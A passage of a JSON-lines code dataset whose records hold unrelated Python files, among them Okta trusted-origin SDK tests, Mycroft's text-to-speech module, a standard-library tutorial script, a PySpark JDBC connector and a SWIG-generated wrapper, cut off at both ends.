\"type\": models.ScopeType.CORS\n }),\n models.Scope({\n \"type\": models.ScopeType.REDIRECT\n }),\n ]\n })\n\n created_trusted_origin, _, err = await \\\n client.create_origin(trusted_origin_model)\n assert err is None\n assert isinstance(created_trusted_origin, models.TrustedOrigin)\n\n # Retrieve\n retrieved_origin, _, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert err is None\n assert isinstance(retrieved_origin, models.TrustedOrigin)\n assert retrieved_origin.name == created_trusted_origin.name\n assert len(retrieved_origin.scopes) == 2\n\n # Delete\n _, err = await client.delete_origin(created_trusted_origin.id)\n\n @pytest.mark.vcr()\n @pytest.mark.asyncio\n async def test_list_origins(self, fs):\n # Instantiate Mock Client\n client = MockOktaClient(fs)\n\n # Create Trusted Origin\n TO_NAME = f\"{TestTrustedOriginsResource.SDK_PREFIX}_test_TO\"\n TO_ORIGIN = \"http://example.com\"\n trusted_origin_model = models.TrustedOrigin({\n \"name\": TO_NAME,\n \"origin\": TO_ORIGIN,\n \"scopes\": [\n models.Scope({\n \"type\": models.ScopeType.CORS\n }),\n models.Scope({\n \"type\": models.ScopeType.REDIRECT\n }),\n ]\n })\n\n created_trusted_origin, _, err = await \\\n client.create_origin(trusted_origin_model)\n assert err is None\n assert isinstance(created_trusted_origin, models.TrustedOrigin)\n\n # List\n trusted_origins, _, err = await client.list_origins()\n assert err is None\n assert isinstance(trusted_origins, list)\n assert len(trusted_origins) > 0\n assert isinstance(trusted_origins[0], models.TrustedOrigin)\n assert next((to for to in trusted_origins\n if to.name == created_trusted_origin.name), None) \\\n is not None\n\n # Delete\n _, err = await client.delete_origin(created_trusted_origin.id)\n\n @pytest.mark.vcr()\n @pytest.mark.asyncio\n async def test_delete_origin(self, fs):\n # Instantiate Mock Client\n client = MockOktaClient(fs)\n\n # Create Trusted Origin\n TO_NAME = f\"{TestTrustedOriginsResource.SDK_PREFIX}_test_TO\"\n TO_ORIGIN = \"http://example.com\"\n trusted_origin_model = models.TrustedOrigin({\n \"name\": TO_NAME,\n \"origin\": TO_ORIGIN,\n \"scopes\": [\n models.Scope({\n \"type\": models.ScopeType.CORS\n }),\n models.Scope({\n \"type\": models.ScopeType.REDIRECT\n }),\n ]\n })\n\n created_trusted_origin, _, err = await \\\n client.create_origin(trusted_origin_model)\n assert err is None\n assert isinstance(created_trusted_origin, models.TrustedOrigin)\n\n # Retrieve\n retrieved_origin, _, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert err is None\n assert isinstance(retrieved_origin, models.TrustedOrigin)\n assert retrieved_origin.name == created_trusted_origin.name\n assert len(retrieved_origin.scopes) == 2\n\n # Delete\n _, err = await client.delete_origin(created_trusted_origin.id)\n\n # Retrieve to validate\n retrieved_origin, resp, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert err is not None\n assert isinstance(err, OktaAPIError)\n assert resp.get_status() == HTTPStatus.NOT_FOUND\n assert retrieved_origin is None\n\n @pytest.mark.vcr()\n @pytest.mark.asyncio\n async def test_update_origin(self, fs):\n # Instantiate Mock Client\n client = MockOktaClient(fs)\n\n # Create Trusted Origin\n TO_NAME = f\"{TestTrustedOriginsResource.SDK_PREFIX}_test_TO\"\n TO_ORIGIN = \"http://example.com\"\n trusted_origin_model = models.TrustedOrigin({\n \"name\": TO_NAME,\n \"origin\": TO_ORIGIN,\n \"scopes\": [\n models.Scope({\n \"type\": models.ScopeType.CORS\n }),\n models.Scope({\n \"type\": models.ScopeType.REDIRECT\n }),\n ]\n })\n\n created_trusted_origin, _, err = await \\\n client.create_origin(trusted_origin_model)\n assert err is None\n assert isinstance(created_trusted_origin, models.TrustedOrigin)\n\n # Retrieve\n retrieved_origin, _, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert err is None\n assert isinstance(retrieved_origin, models.TrustedOrigin)\n assert retrieved_origin.name == created_trusted_origin.name\n assert len(retrieved_origin.scopes) == 2\n\n # Update\n updated_trusted_origin_model = models.TrustedOrigin({\n \"name\": TO_NAME + \"_updated\",\n \"origin\": TO_ORIGIN,\n \"scopes\": [\n models.Scope({\n \"type\": models.ScopeType.CORS\n }),\n models.Scope({\n \"type\": models.ScopeType.REDIRECT\n }),\n ]\n })\n updated_origin, _, err = await \\\n client.update_origin(created_trusted_origin.id,\n updated_trusted_origin_model)\n assert err is None\n assert isinstance(updated_origin, models.TrustedOrigin)\n assert updated_origin.id == created_trusted_origin.id\n assert updated_origin.name == updated_trusted_origin_model.name\n\n # Retrieve to validate\n retrieved_origin, resp, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert retrieved_origin.id == created_trusted_origin.id\n assert retrieved_origin.name == updated_origin.name\n\n # Delete\n _, err = await client.delete_origin(created_trusted_origin.id)\n\n @pytest.mark.vcr()\n @pytest.mark.asyncio\n async def test_activate_deactivate_origin(self, fs):\n # Instantiate Mock Client\n client = MockOktaClient(fs)\n\n # Create Trusted Origin\n TO_NAME = f\"{TestTrustedOriginsResource.SDK_PREFIX}_test_TO\"\n TO_ORIGIN = \"http://example.com\"\n trusted_origin_model = models.TrustedOrigin({\n \"name\": TO_NAME,\n \"origin\": TO_ORIGIN,\n \"scopes\": [\n models.Scope({\n \"type\": models.ScopeType.CORS\n }),\n models.Scope({\n \"type\": models.ScopeType.REDIRECT\n }),\n ]\n })\n\n created_trusted_origin, _, err = await \\\n client.create_origin(trusted_origin_model)\n assert err is None\n assert isinstance(created_trusted_origin, models.TrustedOrigin)\n assert created_trusted_origin.status == \"ACTIVE\"\n\n # Deactivate\n deactivated_origin, _, err = await \\\n client.deactivate_origin(created_trusted_origin.id)\n assert err is None\n assert deactivated_origin.status == \"INACTIVE\"\n\n # Retrieve to validate\n retrieved_origin, resp, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert retrieved_origin.id == created_trusted_origin.id\n assert retrieved_origin.status == \"INACTIVE\"\n\n # Reactivate\n reactivated_origin, _, err = await \\\n client.activate_origin(created_trusted_origin.id)\n assert err is None\n assert reactivated_origin.status == \"ACTIVE\"\n\n # Retrieve to validate\n retrieved_origin, resp, err = await \\\n client.get_origin(created_trusted_origin.id)\n assert retrieved_origin.id == created_trusted_origin.id\n assert retrieved_origin.status == \"ACTIVE\"\n\n # Delete\n _, err = await client.delete_origin(created_trusted_origin.id)\n"} {"ext": "py", "sha": "1a2f2ffdd7ac9f733b0540a9041999b6fa7df820", "content": "#unit test script to test sum module under my_sum\n\nimport sys\n\nsys.path.append('/home/user/workarea/projects/learn-pyspark/jobs/samples/')\n\nimport unittest\nimport pytest\n\nfrom calc import basic\n\ndef test_func():\n assert basic.func(5)==6\n"} {"ext": "py", "sha": "1a2f30ad308da16cdbd261bb36d4ed8b0d26b32d", "content": "# Copyright 2017 Mycroft AI Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport hashlib\nimport os\nimport random\nimport re\nimport sys\nfrom abc import ABCMeta, abstractmethod\nfrom threading import Thread\nfrom time import time, sleep\n\nimport os.path\nfrom os.path import dirname, exists, isdir, join\n\nimport mycroft.util\nfrom mycroft.client.enclosure.api import EnclosureAPI\nfrom mycroft.configuration import Configuration\nfrom mycroft.messagebus.message import Message\nfrom mycroft.metrics import report_timing, Stopwatch\nfrom mycroft.util import (\n play_wav, play_mp3, check_for_signal, create_signal, resolve_resource_file\n)\nfrom mycroft.util.log import LOG\nfrom queue import Queue, Empty\n\n\ndef send_playback_metric(stopwatch, ident):\n \"\"\"\n Send playback metrics in a background thread\n \"\"\"\n\n def do_send(stopwatch, ident):\n report_timing(ident, 'speech_playback', stopwatch)\n\n t = Thread(target=do_send, args=(stopwatch, ident))\n t.daemon = True\n t.start()\n\n\nclass PlaybackThread(Thread):\n \"\"\"\n Thread class for playing back tts audio and sending\n visime data to enclosure.\n \"\"\"\n\n def __init__(self, queue):\n super(PlaybackThread, self).__init__()\n self.queue = queue\n self._terminated = False\n self._processing_queue = False\n self._clear_visimes = False\n\n def init(self, tts):\n self.tts = tts\n\n def clear_queue(self):\n \"\"\"\n Remove all pending playbacks.\n \"\"\"\n while not self.queue.empty():\n self.queue.get()\n try:\n self.p.terminate()\n except:\n pass\n\n def run(self):\n \"\"\"\n Thread main loop. get audio and visime data from queue\n and play.\n \"\"\"\n while not self._terminated:\n try:\n snd_type, data, visimes, ident = self.queue.get(timeout=2)\n self.blink(0.5)\n if not self._processing_queue:\n self._processing_queue = True\n self.tts.begin_audio()\n\n stopwatch = Stopwatch()\n with stopwatch:\n if snd_type == 'wav':\n self.p = play_wav(data)\n elif snd_type == 'mp3':\n self.p = play_mp3(data)\n\n if visimes:\n if self.show_visimes(visimes):\n self.clear_queue()\n else:\n self.p.communicate()\n self.p.wait()\n send_playback_metric(stopwatch, ident)\n\n if self.queue.empty():\n self.tts.end_audio()\n self._processing_queue = False\n self.blink(0.2)\n except Empty:\n pass\n except Exception as e:\n LOG.exception(e)\n if self._processing_queue:\n self.tts.end_audio()\n self._processing_queue = False\n\n def show_visimes(self, pairs):\n \"\"\"\n Send visime data to enclosure\n\n Args:\n pairs(list): Visime and timing pair\n\n Returns:\n True if button has been pressed.\n \"\"\"\n start = time()\n for code, duration in pairs:\n if self._clear_visimes:\n self._clear_visimes = False\n return True\n if self.enclosure:\n # Include time stamp to assist with animation timing\n self.enclosure.mouth_viseme(code, start + duration)\n delta = time() - start\n if delta < duration:\n sleep(duration - delta)\n return False\n\n def clear_visimes(self):\n self._clear_visimes = True\n\n def blink(self, rate=1.0):\n \"\"\" Blink mycroft's eyes \"\"\"\n if self.enclosure and random.random() < rate:\n self.enclosure.eyes_blink(\"b\")\n\n def stop(self):\n \"\"\" Stop thread \"\"\"\n self._terminated = True\n self.clear_queue()\n\n\nclass TTS(object):\n \"\"\"\n TTS abstract class to be implemented by all TTS engines.\n\n It aggregates the minimum required parameters and exposes\n ``execute(sentence)`` and ``validate_ssml(sentence)`` functions.\n\n Args:\n lang (str):\n config (dict): Configuration for this specific tts engine\n validator (TTSValidator): Used to verify proper installation\n phonetic_spelling (bool): Whether to spell certain words phonetically\n ssml_tags (list): Supported ssml properties. Ex. ['speak', 'prosody']\n \"\"\"\n __metaclass__ = ABCMeta\n\n def __init__(self, lang, config, validator, audio_ext='wav',\n phonetic_spelling=True, ssml_tags=None):\n super(TTS, self).__init__()\n self.lang = lang or 'en-us'\n self.config = config\n self.validator = validator\n self.phonetic_spelling = phonetic_spelling\n self.audio_ext = audio_ext\n self.ssml_tags = ssml_tags or []\n\n self.voice = config.get(\"voice\")\n self.filename = '/tmp/tts.wav'\n self.enclosure = None\n random.seed()\n self.queue = Queue()\n self.playback = PlaybackThread(self.queue)\n self.playback.start()\n self.clear_cache()\n self.spellings = self.load_spellings()\n\n def load_spellings(self):\n \"\"\"Load phonetic spellings of words as dictionary\"\"\"\n path = join('text', self.lang, 'phonetic_spellings.txt')\n spellings_file = resolve_resource_file(path)\n if not spellings_file:\n return {}\n try:\n with open(spellings_file) as f:\n lines = filter(bool, f.read().split('\\n'))\n lines = [i.split(':') for i in lines]\n return {key.strip(): value.strip() for key, value in lines}\n except ValueError:\n LOG.exception('Failed to load phonetic spellings.')\n return {}\n\n def begin_audio(self):\n \"\"\"Helper function for child classes to call in execute()\"\"\"\n # Create signals informing start of speech\n self.ws.emit(Message(\"recognizer_loop:audio_output_start\"))\n\n def end_audio(self):\n \"\"\"\n Helper function for child classes to call in execute().\n\n Sends the recognizer_loop:audio_output_end message, indicating\n that speaking is done for the moment. It also checks if cache\n directory needs cleaning to free up disk space.\n \"\"\"\n\n self.ws.emit(Message(\"recognizer_loop:audio_output_end\"))\n # Clean the cache as needed\n cache_dir = mycroft.util.get_cache_directory(\"tts\")\n mycroft.util.curate_cache(cache_dir, min_free_percent=100)\n\n # This check will clear the \"signal\"\n check_for_signal(\"isSpeaking\")\n\n def init(self, ws):\n self.ws = ws\n self.playback.init(self)\n self.enclosure = EnclosureAPI(self.ws)\n self.playback.enclosure = self.enclosure\n\n def get_tts(self, sentence, wav_file):\n \"\"\"\n Abstract method that a tts implementation needs to implement.\n Should get data from tts.\n\n Args:\n sentence(str): Sentence to synthesize\n wav_file(str): output file\n\n Returns:\n tuple: (wav_file, phoneme)\n \"\"\"\n pass\n\n def modify_tag(self, tag):\n \"\"\"Override to modify each supported ssml tag\"\"\"\n return tag\n\n @staticmethod\n def remove_ssml(text):\n return re.sub('<[^>]*>', '', text).replace(' ', ' ')\n\n def validate_ssml(self, utterance):\n \"\"\"\n Check if engine supports ssml, if not remove all tags\n Remove unsupported / invalid tags\n\n Args:\n utterance(str): Sentence to validate\n\n Returns: validated_sentence (str)\n \"\"\"\n # if ssml is not supported by TTS engine remove all tags\n if not self.ssml_tags:\n return self.remove_ssml(utterance)\n\n # find ssml tags in string\n tags = re.findall('<[^>]*>', utterance)\n\n for tag in tags:\n if any(supported in tag for supported in self.ssml_tags):\n utterance = utterance.replace(tag, self.modify_tag(tag))\n else:\n # remove unsupported tag\n utterance = utterance.replace(tag, \"\")\n\n # return text with supported ssml tags only\n return utterance.replace(\" \", \" \")\n\n def execute(self, sentence, ident=None):\n \"\"\"\n Convert sentence to speech, preprocessing out unsupported ssml\n\n The method caches results if possible using the hash of the\n sentence.\n\n Args:\n sentence: Sentence to be spoken\n ident: Id reference to current interaction\n \"\"\"\n sentence = self.validate_ssml(sentence)\n\n create_signal(\"isSpeaking\")\n if self.phonetic_spelling:\n for word in re.findall(r\"[\\w']+\", sentence):\n if word.lower() in self.spellings:\n sentence = sentence.replace(word,\n self.spellings[word.lower()])\n\n key = str(hashlib.md5(sentence.encode('utf-8', 'ignore')).hexdigest())\n wav_file = os.path.join(mycroft.util.get_cache_directory(\"tts\"),\n key + '.' + self.audio_ext)\n\n if os.path.exists(wav_file):\n LOG.debug(\"TTS cache hit\")\n phonemes = self.load_phonemes(key)\n else:\n wav_file, phonemes = self.get_tts(sentence, wav_file)\n if phonemes:\n self.save_phonemes(key, phonemes)\n\n vis = self.visime(phonemes)\n self.queue.put((self.audio_ext, wav_file, vis, ident))\n\n def visime(self, phonemes):\n \"\"\"\n Create visimes from phonemes. Needs to be implemented for all\n tts backend\n\n Args:\n phonemes(str): String with phoneme data\n \"\"\"\n return None\n\n def clear_cache(self):\n \"\"\" Remove all cached files. \"\"\"\n if not os.path.exists(mycroft.util.get_cache_directory('tts')):\n return\n for f in os.listdir(mycroft.util.get_cache_directory(\"tts\")):\n file_path = os.path.join(mycroft.util.get_cache_directory(\"tts\"),\n f)\n if os.path.isfile(file_path):\n os.unlink(file_path)\n\n def save_phonemes(self, key, phonemes):\n \"\"\"\n Cache phonemes\n\n Args:\n key: Hash key for the sentence\n phonemes: phoneme string to save\n \"\"\"\n\n cache_dir = mycroft.util.get_cache_directory(\"tts\")\n pho_file = os.path.join(cache_dir, key + \".pho\")\n try:\n with open(pho_file, \"w\") as cachefile:\n cachefile.write(phonemes)\n except:\n LOG.debug(\"Failed to write .PHO to cache\")\n pass\n\n def load_phonemes(self, key):\n \"\"\"\n Load phonemes from cache file.\n\n Args:\n Key: Key identifying phoneme cache\n \"\"\"\n pho_file = os.path.join(mycroft.util.get_cache_directory(\"tts\"),\n key + \".pho\")\n if os.path.exists(pho_file):\n try:\n with open(pho_file, \"r\") as cachefile:\n phonemes = cachefile.read().strip()\n return phonemes\n except:\n LOG.debug(\"Failed to read .PHO from cache\")\n return None\n\n def __del__(self):\n self.playback.stop()\n self.playback.join()\n\n\nclass TTSValidator(object):\n \"\"\"\n TTS Validator abstract class to be implemented by all TTS engines.\n\n It exposes and implements ``validate(tts)`` function as a template to\n validate the TTS engines.\n \"\"\"\n __metaclass__ = ABCMeta\n\n def __init__(self, tts):\n self.tts = tts\n\n def validate(self):\n self.validate_dependencies()\n self.validate_instance()\n self.validate_filename()\n self.validate_lang()\n self.validate_connection()\n\n def validate_dependencies(self):\n pass\n\n def validate_instance(self):\n clazz = self.get_tts_class()\n if not isinstance(self.tts, clazz):\n raise AttributeError('tts must be instance of ' + clazz.__name__)\n\n def validate_filename(self):\n filename = self.tts.filename\n if not (filename and filename.endswith('.wav')):\n raise AttributeError('file: %s must be in .wav format!' % filename)\n\n dir_path = dirname(filename)\n if not (exists(dir_path) and isdir(dir_path)):\n raise AttributeError('filename: %s is not valid!' % filename)\n\n @abstractmethod\n def validate_lang(self):\n pass\n\n @abstractmethod\n def validate_connection(self):\n pass\n\n @abstractmethod\n def get_tts_class(self):\n pass\n\n\nclass TTSFactory(object):\n from mycroft.tts.espeak_tts import ESpeak\n from mycroft.tts.fa_tts import FATTS\n from mycroft.tts.google_tts import GoogleTTS\n from mycroft.tts.mary_tts import MaryTTS\n from mycroft.tts.mimic_tts import Mimic\n from mycroft.tts.spdsay_tts import SpdSay\n from mycroft.tts.ibm_tts import WatsonTTS\n from mycroft.tts.polly_tts import PollyTTS\n from mycroft.tts.bing_tts import BingTTS\n from mycroft.tts.beepspeak_tts import BeepSpeak\n from mycroft.tts.responsive_voice_tts import ResponsiveVoice\n\n CLASSES = {\n \"mimic\": Mimic,\n \"google\": GoogleTTS,\n \"marytts\": MaryTTS,\n \"fatts\": FATTS,\n \"espeak\": ESpeak,\n \"spdsay\": SpdSay,\n \"polly\": PollyTTS,\n \"watson\": WatsonTTS,\n \"bing\": BingTTS,\n \"beep_speak\": BeepSpeak,\n \"responsive_voice\": ResponsiveVoice\n }\n\n @staticmethod\n def create():\n \"\"\"\n Factory method to create a TTS engine based on configuration.\n\n The configuration file ``mycroft.conf`` contains a ``tts`` section with\n the name of a TTS module to be read by this method.\n\n \"tts\": {\n \"module\": \n }\n \"\"\"\n config = Configuration.get()\n lang = config.get(\"lang\", \"en-us\")\n tts_module = config.get('tts', {}).get('module', 'mimic')\n tts_config = config.get('tts', {}).get(tts_module, {})\n tts_lang = tts_config.get('lang', lang)\n clazz = TTSFactory.CLASSES.get(tts_module)\n tts = clazz(tts_lang, tts_config)\n tts.validator.validate()\n return tts\n"} {"ext": "py", "sha": "1a2f30bb9423ca730b6a6febe87834f7af8a0fcc", "content": "import os \n# cur_directory = print(getcwd()) # Return the current working directory \n# # print(cur_directory)\n# print(os.chdir) # Change current working directory \n\n# os.system('mkdir today') # Run the command mkdir in the system shell. \n\n# There was today folder created in the root folder. \n\n# print(dir(os)) # returns a list of all module functions. \n\n# print(help(os)) # returns an extensive manual page crated from the module's docstring/\n\n\n# import shutil \n# shutil.copyfile('data.db', 'archive.db')\n# shutil.move('/build/executables', 'installdir')\n\n\n# import glob\n# file_list = glob.glob('*.py')\n# print(file_list)\n\n\n\n# import sys \n# print(sys.argv)\n\n# # The argparse module provides more sophiscated mechanisms to process command line arguments\n\n# import argparse\n\n# parser = argparse.ArgumentParser(prog = 'top', description = 'Show top lines from each file')\n# parser.add_argument('filenames', nargs='+')\n# parser.add_argument('-l', '--lines', type=int, default=10)\n# args = parser.parse_args()\n# print(args)\n\n\nimport re\n# f_words = re.findall(r'\\bf[a-z]*', 'which foot or hand fell fastest')\n# print(f_words)\n\n# sub = re.sub(r'\\(\\b[a-z]+) \\1', r'\\1', 'cat in the hat')\n# print(sub)\n\n\na = 'tea for too'.replace('too', 'two')\nprint(a)\n\n# Mathematics \n\nimport math \ncos = math.cos(math.pi / 4)\nprint(cos)\n\nlog = math.log(1024, 2)\nprint(log)\n\n\n# Random module provides tools for making random selections. \n\n\n# import random \n# fruit = random.choice(['apple', 'pear', 'banana'])\n# print(fruit)\n\n# sample = random.sample(range(100), 10) # sampling without replacement \n\n# print(sample)\n\n# random_float = random.random()\n# print(random_float)\n\n# integer_number = random.randrange(6) # random integer chosen from range(6)\n# print(integer_number)\n\n\n\n\n# The statistics modue calculates basic statistical properties \n# (the mean, median, variance, etc) of numeric data. \n\nimport statistics\ndata = [2.75, 1.75, 1.25, 0.25, 0.5, 1.25, 3.5]\nprint(\"mean\", statistics.mean(data))\nprint(\"median :\", statistics.median(data))\nprint(\"variance :\", statistics.variance(data))\n\n#\n# from urllib.request import urlopen\n# with urlopen('http://tycho.usno.navy.mil/cgi-bin/timer.pl') as response:\n# for line in response:\n# line = line.decode('utf-8') # Decoding the binary data to text.\n# if 'EST' in line or 'EDT' in line: # Look for Eastern Time\n# print(line)\n#\n# import smtplib\n#\n# server = smplib.SMTP('localhost')\n# server.sendmail('soothsayer@exmple.org', 'jcaesar@exmple.org',\n# \"\"\"To : jcaesar@example.org\n# From : soothsayer@example.org\n#\n# Beware the Ideas of March.\n# \"\"\")\n# server.quit()\n#\n# import zlib\n# s = b'witch which has which witches wrist watch'\n# print(len(s))\n#\n# t = zlib.compress(s)\n# print(len(t))\n#\n# u = zlib.decompress(t)\n# print(u)\n#\n# print(zlib.crc32(s))\n\nfrom timeit import Timer\n\na = Timer('t=a; a=b; b=t', 'a=1;b=2').timeit()\nprint(a)\nb = Timer('a,b = b,a', 'a=1; b=2').timeit()\nprint(b)\n\n#\n#\n# def for_number(number):\n# for_list = []\n# for i in range(0, 2000000):\n# for_list.append(i)\n#\n# def while_number(number):\n# while_list = []\n# i = 0\n# while i < 2000000:\n# while_list.append(i)\n# i = i + 1\n#\n# d = Timer(while_number(2000000)).timeit()\n#\n# print(d)\n#\n# c = Timer(for_number(2000000)).timeit()\n# print(c)\n\ndef average(values):\n \"\"\"Computes the arithmetic mean of a list of numbers.\n\n >>> print(average([20, 30, 70]))\n 40.0\n\n\n \"\"\"\n return sum(values) / len(values)\n\nimport doctest\n\nz = doctest.testmod()\nprint(z)\n\n\nimport unittest\n\nclass TestStatisticalFunctions(unittest.TestCase):\n\n def test_average(self):\n self.assertEqual(average([20,30,70]), 40.0)\n self.assertEqual(round(average([1, 5, 7]), 1), 4.3)\n with self.assertRaises((ZeroDivisionError)):\n average([])\n with self.assertRaises(TypeError):\n average(20, 30, 70)\n\nunittest.main()"} {"ext": "py", "sha": "1a2f30dc447e062965e5d3168f863193937e133d", "content": "#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n\"\"\"\r\n The Clear BSD License\r\n\r\n Copyright (c) – 2016, NetApp, Inc. All rights reserved.\r\n\r\n Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:\r\n\r\n * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\r\n\r\n * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\r\n\r\n * Neither the name of NetApp, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.\r\n\r\n NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n\"\"\"\r\n\r\n\r\n\r\n\r\nimport unittest\r\nfrom netapp.santricity.models.symbol.not_on_preferred_path import NotOnPreferredPath\r\n\r\nclass NotOnPreferredPathTest(unittest.TestCase):\r\n \"\"\"\r\n NOTE: This class is auto generated by the swagger code generator program.\r\n Do not edit the class manually.\r\n \"\"\"\r\n\r\n # Try instantiating the model\r\n def test_not_on_preferred_path(self):\r\n not_on_preferred_path_obj = NotOnPreferredPath()\r\n self.assertNotEqual(not_on_preferred_path_obj, None)\r\n\r\n\r\n"} {"ext": "py", "sha": "1a2f3124887d8ffabdb5af92e1f6a3900185b604", "content": "#!/usr/local/bin/python3\nfrom os import system, path, getcwd\n\nfilePath = \"assets/alexa-20180320.csv\"\nprint(\"read file: \" + filePath)\nwith open(filePath) as f:\n content = f.readlines()\nlines = [x.strip() for x in content]\n\nfor i in range(0, 10):\n siteName = lines[i].split(\",\")[1]\n print(\"Dealing with \" + str(i) + \" \" + siteName)\n script = \"scripts/extractArchive.sh\"\n siteName = siteName.replace(\".\", \"_\")\n command = \"sh %s %s\" % (script, siteName)\n print(\"run command %s\" % command)\n system(command)\n"} {"ext": "py", "sha": "1a2f318380d27f90a9f3d30e3f8393cadd4da648", "content": "#!/usr/bin/python3\nimport sys\n\n\ndef safe_print_integer_err(value):\n is_int = True\n try:\n print(\"{:d}\".format(value))\n except Exception as e:\n print(\"Exception:\", e, file=sys.stderr)\n is_int = False\n return is_int\n"} {"ext": "py", "sha": "1a2f31eabf5896f9a474363a06a67a0704df22be", "content": "import hug\nimport api\n\n@hug.cli()\n@hug.get('/health')\n@hug.local()\ndef health_check():\n return {'message': 'Status: Running'}\n\n\n# @hug.extend_api('/{BASE_URL_ROUTE}')\n@hug.extend_api()\ndef apis():\n return [api]\n"} {"ext": "py", "sha": "1a2f32f465d251d0b5f8bae0c4db8c8199036fb8", "content": "import pyspark.sql.functions as psf\nfrom pyspark.sql import SparkSession, DataFrame\n\nfrom .data_link import DataLink\n\n\nclass JdbcDataLink(DataLink):\n def __init__(\n self,\n environment: str,\n session: SparkSession,\n url: str,\n username: str,\n password: str,\n driver: str,\n table: str,\n save_mode: str = \"error\",\n number_of_partitions: int = 1,\n partition_column: str = \"\",\n ):\n super().__init__(environment, session)\n\n self.number_of_partitions = number_of_partitions\n self.partition_column = partition_column\n self.save_mode = save_mode\n self.connection_properties = {\n \"url\": url,\n \"user\": username,\n \"password\": password,\n \"driver\": driver,\n \"dbtable\": table,\n }\n\n def read(self) -> DataFrame:\n # Partition parameters are only applicable for read operation\n # for now, order is important as some values can be overwritten\n reader = self.spark.read.format(\"jdbc\").options(**self.connection_properties)\n\n if self.number_of_partitions == 1:\n return reader.load()\n\n else:\n # We need a partition column\n if self.partition_column == \"\":\n raise AssertionError(\"Partitioning column should not be empty.\")\n\n col = psf.col(self.partition_column)\n # Retrieve lower and upper bound first to determine the degree of parallelism\n lower_bound, upper_bound = (\n reader.load()\n .select(\n psf.min(col).alias(\"mmin\"),\n psf.max(col).alias(\"mmax\"),\n )\n .collect()[0]\n )\n\n return (\n reader.option(\"partitionColumn\", self.partition_column)\n .option(\"numPartitions\", str(self.number_of_partitions))\n .option(\"lowerBound\", str(lower_bound))\n .option(\"upperBound\", str(upper_bound))\n .load()\n )\n\n def write(self, frame: DataFrame) -> None:\n (\n frame.write.format(\"jdbc\")\n .mode(self.save_mode)\n .options(**self.connection_properties)\n .save()\n )\n"} {"ext": "py", "sha": "1a2f334492020c13f496704486b147409467400f", "content": "# This file was automatically generated by SWIG (http://www.swig.org).\n# Version 3.0.12\n#\n# Do not make changes to this file unless you know what you are doing--modify\n# the SWIG interface file instead.\n\nfrom sys import version_info as _swig_python_version_info\nif _swig_python_version_info >= (2, 7, 0):\n def swig_import_helper():\n import importlib\n pkg = __name__.rpartition('.')[0]\n mname = '.'.join((pkg, '_coarse_sun_sensor')).lstrip('.')\n try:\n return importlib.import_module(mname)\n except ImportError:\n return importlib.import_module('_coarse_sun_sensor')\n _coarse_sun_sensor = swig_import_helper()\n del swig_import_helper\nelif _swig_python_version_info >= (2, 6, 0):\n def swig_import_helper():\n from os.path import dirname\n import imp\n fp = None\n try:\n fp, pathname, description = imp.find_module('_coarse_sun_sensor', [dirname(__file__)])\n except ImportError:\n import _coarse_sun_sensor\n return _coarse_sun_sensor\n try:\n _mod = imp.load_module('_coarse_sun_sensor', fp, pathname, description)\n finally:\n if fp is not None:\n fp.close()\n return _mod\n _coarse_sun_sensor = swig_import_helper()\n del swig_import_helper\nelse:\n import _coarse_sun_sensor\ndel _swig_python_version_info\n\ntry:\n _swig_property = property\nexcept NameError:\n pass # Python < 2.2 doesn't have 'property'.\n\ntry:\n import builtins as __builtin__\nexcept ImportError:\n import __builtin__\n\ndef _swig_setattr_nondynamic(self, class_type, name, value, static=1):\n if (name == \"thisown\"):\n return self.this.own(value)\n if (name == \"this\"):\n if type(value).__name__ == 'SwigPyObject':\n self.__dict__[name] = value\n return\n method = class_type.__swig_setmethods__.get(name, None)\n if method:\n return method(self, value)\n if (not static):\n if _newclass:\n object.__setattr__(self, name, value)\n else:\n self.__dict__[name] = value\n else:\n raise AttributeError(\"You cannot add attributes to %s\" % self)\n\n\ndef _swig_setattr(self, class_type, name, value):\n return _swig_setattr_nondynamic(self, class_type, name, value, 0)\n\n\ndef _swig_getattr(self, class_type, name):\n if (name == \"thisown\"):\n return self.this.own()\n method = class_type.__swig_getmethods__.get(name, None)\n if method:\n return method(self)\n raise AttributeError(\"'%s' object has no attribute '%s'\" % (class_type.__name__, name))\n\n\ndef _swig_repr(self):\n try:\n strthis = \"proxy of \" + self.this.__repr__()\n except __builtin__.Exception:\n strthis = \"\"\n return \"<%s.%s; %s >\" % (self.__class__.__module__, 